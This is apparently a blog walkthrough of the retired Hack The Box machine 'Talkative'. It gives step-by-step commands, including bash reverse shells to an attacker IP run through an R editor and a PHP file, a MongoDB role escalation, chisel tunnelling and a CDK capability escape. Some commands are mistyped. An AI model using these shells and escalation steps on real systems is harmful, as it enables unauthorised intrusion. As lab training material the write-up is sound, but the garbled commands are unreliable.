Hey guys back again to another exciting write-up. Today we are going to discuss about talkative hack the box machine which is an interesting machine that comes up with a bolt cms vulnerability to get a user shell and no SQL injection to get the root flag of that machine
And This is the hardest machine which is currently retired in hack the box
ENUMERATION
So first as usual we startup with our nmap scan
STEP 1: nmap -sC -sV 10.10.11.155
Further analyzing this nmap report I have found the 2 interesting ports which is 3000,8080 etc.
So let us check it this
First, add the talkative. htb to /etc/hosts to access that website
Let's visit that website.
BOLT CMS
And I found that the website has bolt CMS which is very interesting but we need that username and password.
Next, I check out the port 3000 http://talkative.htb:3000
Which is a rocket chat website.
Here we can able to register so I register using this
After getting the login access I found the admin username which is saul Goodman but something should be interesting here
So Next, I check out port 8080 http://talkative.htb:8080
JAMOVI
Which is a jamovi
Here I found the RJ editor which is something interesting so here we can able execute system commands. so lets us try for bash payload
Before that start your listener in your local machine
STEP 2: nc -lvp 4040
STEP 3: system(‘bash -c “bash -i >& /dev/tcp/10.10.14.xx/4040 0>&1”’)
And press the ctrl+shift+Enter
Boooooooommmmm!!!
Now you get the root shell but not a user shell. one of the docker container
Further analyzing this machine I have found the bolt-administration.omv file which is something interesting but we cannot able to download that file to your local machine and here there is a no tools to unzip that file.
So I tried this using the pwncat first download that tool using the below command
STEP 4: pip3 install pwncat-cs
Or visit that Github using this link
Now setup your listener
STEP 5: pwncat-cs -lp 4040
And enter the reverse again in RJ editor and run it.
You will get the shell in pwncat
Next, use the download command to download that file to your local machine.
STEP 6: download /root/bolt-administration.omv
Next, unzip that file
STEP 7: unzip bolt-administration.omv
And open the xdata.json file you can able to see the username and password
username: admin and password: jeO09ufhWD<s
So let us use this username and password in bolt CMS
Booooooooooommmmmm!!!!!
Now you get access to bolt cms
Next, I checked the configuration file
Here we can able to edit the file but we cannot able to upload it.
And there are two interesting files which is bundle.php and preload.php. Preload.php we will be run when we restart that website so I have written the reverse shell in bundles.php
Before that fire up your pwncat
STEP8: pwncat-cs -lp 5050
STEP 9: <?php system(‘bash -c “bash -i >& /dev/tcp/10.10.14.xx/5050 0>&1”’) ?>
Booooooooommmmmm!!!!!
Now you will get the shell.
STEP 10: back
Next enter the command hostname -i. you get the IP address of that machine which is 172.17.0.1
So using this we going to log in through SSH
GETTING USER SHELL
STEP 11: ssh saul@172.168.01
And enter the password: jeO09ufhWD<s
Booooooooooooooooommmm!!!!!
Now you get the user shell of that machine
STEP 12: cat user.txt
Let us move to the root.
DOCKER ANALYSIS
So let us check out the background processes of docker
STEP 13: ps -auxww | grep docker
172.18.0.2 is running in port 8080 which is jamovi
172.17.0.3 is running in port 3000 which is a rocket chat
172.17.0.4–19 is running in port 80
172.17.0.2 which does not have any port forwarded to it
So let us scan this IP using the nmap
Before that download the compiled nmap script and send the file to the remote host
STEP 14: python3 -m http.server 5051
STEP 15: curl http://10.10.14.xx:5051/nmap -o nmap
Now you can able to run the nmap
STEP 16: nmap — min-rate1000 -p-
Port 27017 is open which is a default port of MongoDB
So let us port forward this container to our local machine to get access to the mongo database
Before that download the tool chisel https://github.com/jpillora/chisel
Send this chisel to the remote machine
Before that setup the listener in your local machine
STEP 17: ./chisel server -p 8000 —reverse
STEP 18: ./chisel client 10.10.14.35:8000 R:27017:172.17.0.2:27017
Now it will port forward to our local machine
So next we going to enumerate the mongo DB
Before that download, the mongo DB using this link
After downloading the mongo DB open the terminal and type mongosh
Now you get access to that mongo db of remote machine because we are port forwarded that machine to our local machine
STEP 19: show database;
Here I have checked out the admin database but nothing should be interested so let us check out that metero
STEP 20: use metero;
STEP 21: show tables;
Now you can able see tables of the rocket chat
STEP 22: db.users.find()
Now you can able to see the users of the rocket chat
So here Let us change our id role to admin to get the admin access
STEP 23: db.users.update({“_id”: “Rtypdicdqoooo7n8”], { $set: {“roles” : [“admin”]}})
Next login through your user name and password you will get admin access.
Further analyzing this website I have found the integration feature on that website
Here we can execute the script
Read the Above article you will get more ideas.
Using this integration feature we can able execute the code
So first download the code using this link
before that fire up your pwncat
STEP 24: pwncat-cs -lvp 1234
First, click the new integration
And click the incoming connection webhook
Then fill up details and set all the options true to execute that script
And enter the payload in the script box
Next refresh that page you will get the webhook URL
Just curl that URL.
STEP 25: curl http://talkative.htb:3000/Gklfjlkjfkljfkjfkjkfdjalkririj529i99
Booooooommm!!!!!
After getting the connection upload the CDK
CDK is the open-sourced container penetration toolkit which is a very amazing tool just download it using the below link.
Next upload this tool to that remote machine.
STEP 26: upload cdk /root/cdk1
STEP 27: back
Next, go to the root folder you can able to see the cdk1 file
STEP 28: chmod 777 cdk1
STEP 29: ./cdk run cap-dac-read-search
boooooooooooooooooooommmm!!!!!!!!
Now you will get the password file
STEP 30: ./cdk run cap-dac-read-search /root/root.txt
Huuuuurrrrrrrhhhhhh!!! Now you get the root flag
I hope you will understand this article if you like this please support us
OWSE student:
Give support and applause for this article
